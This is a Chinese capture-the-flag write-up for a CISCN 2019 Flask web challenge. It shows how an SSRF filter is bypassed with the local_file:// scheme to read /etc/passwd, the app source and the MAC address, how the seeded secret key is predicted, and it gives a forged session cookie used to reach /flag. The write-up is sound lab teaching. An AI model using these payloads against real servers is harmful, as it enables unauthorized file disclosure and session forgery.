• ciscn2019华东南赛区web4题解


    进入题目页面会提示read something,点击会进入如下链接的页面:

    http://4970349e-b8c1-49e8-9594-666375a56ca2.node3.buuoj.cn/read?url=https://baidu.com
    

    页面显示no response。

    尝试利用url读取文件,使用file:///etc/passwd。

    提示no hack。

    看着url不像是PHP,因为我好像极少见过PHP用这种路由,直接冒一波险猜他是flask。使用local_file:///etc/passwd读取。

    冒险成功。

    接下来读app/app.py把源码拿下来。

    import re, random, uuid, urllib
    from flask import Flask, session, request
    
    app = Flask(__name__)
    random.seed(uuid.getnode())
    app.config['SECRET_KEY'] = str(random.random()*233)
    app.debug = True
    
    @app.route('/')
    def index():
        session['username'] = 'www-data'
        return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'
    
    @app.route('/read')
    def read():
        try:
            url = request.args.get('url')
            m = re.findall('^file.*', url, re.IGNORECASE)
            n = re.findall('flag', url, re.IGNORECASE)
            if m or n:
                return 'No Hack'
            res = urllib.urlopen(url)
            return res.read()
        except Exception as ex:
            print str(ex)
        return 'no response'
    
    @app.route('/flag')
    def flag():
        if session and session['username'] == 'fuck':
            return open('/flag.txt').read()
        else:
            return 'Access denied'
    
    if __name__=='__main__':
        app.run(
            debug=True,
            host="0.0.0.0"
        )
    

    在源码中可以看到有一个flag路由,如果session的username为fuck可以直接得到flag。所以接下来的关键就是看看能不能伪造session。

    伪造session需要密钥,正好源码中涉及了。

    random.seed(uuid.getnode())
    app.config['SECRET_KEY'] = str(random.random()*233)
    

    对于伪随机数,如果seed是固定的,生成的随机数是可以预测的,也就是顺序固定的,所以只要知道seed的值即可。这里的seed使用的uuid.getnode()的值,该函数用于获取Mac地址并将其转换为整数。所以我们还需要读一下Mac地址。

    使用的payload为local_file:///sys/class/net/eth0/address

    得到Mac地址为:02:42:ae:01:d9:0e。

    接下来使用python2求解,因为python3和python2的str保留的位数不一样。

    import random
    random.seed(0x0242ae01d90e)
    print(str(random.random()*233))
    

    得到115.152461339。

    接下来使用github的flask-session-manager进行加解密。

    首先解密session得到{u'username': 'www-data'},将www-data换成fuck并加密得到:

    eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.XonT0Q.wFSm3JOFRrHW-whBsQRIwAn64_0。

    访问/flag并修改session得到flag。

  • 相关阅读:
    WEB前端第四十四课——jQuery框架(二)常用方法
    WEB前端第四十三课——jQuery框架(一)$()函数、添加事件监听
    WEB前端第四十二课——应用案例-瀑布流、递归、代理
    WEB前端第四十一课——简单算法与解析indexof、hash、冒泡排序、递归、JSON
    WEB前端第四十课——正则表达式-RegExp、高级
    WEB前端第三十九课——HTML正则表达式-基础、修饰符、检索模式
    SITE STRUCTURE
    CSS GRID ESSENTIALS
    CSS TYPOGRAPHY
    CSS COLOR
  • 原文地址:https://www.cnblogs.com/kevinbruce656/p/12638984.html
Copyright © 2020-2023  润新知